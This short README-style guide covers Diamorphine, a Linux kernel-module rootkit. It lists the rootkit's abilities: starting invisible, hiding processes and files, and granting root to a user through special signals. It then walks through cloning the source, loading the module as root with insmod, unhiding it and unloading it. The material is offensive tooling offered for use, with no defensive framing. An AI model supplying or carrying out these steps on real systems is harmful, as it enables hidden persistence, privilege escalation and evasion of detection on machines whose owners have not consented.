Diamorphine is a LKM rootkit for Linux Kernels 2.6.X/3.X

When loaded, the module starts invisible;

Hide/unhide any process by sending a signal 31;

Sending a signal 63(to any pid) makes the module become (in)visible;

Sending a signal 64(to any pid) makes the given user become root;

Files or directories starting with the MAGIC_PREFIX become invisble;

Source: https://github.com/m0nad/Diamorphine


Verify if the kernel is 2.6.X/3.X

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine



Load the module(as root)

insmod diamorphine.ko


The module starts invisible, to remove you need to make its visible

kill -63 0

Then remove the module(as root)

rmmod diamorphine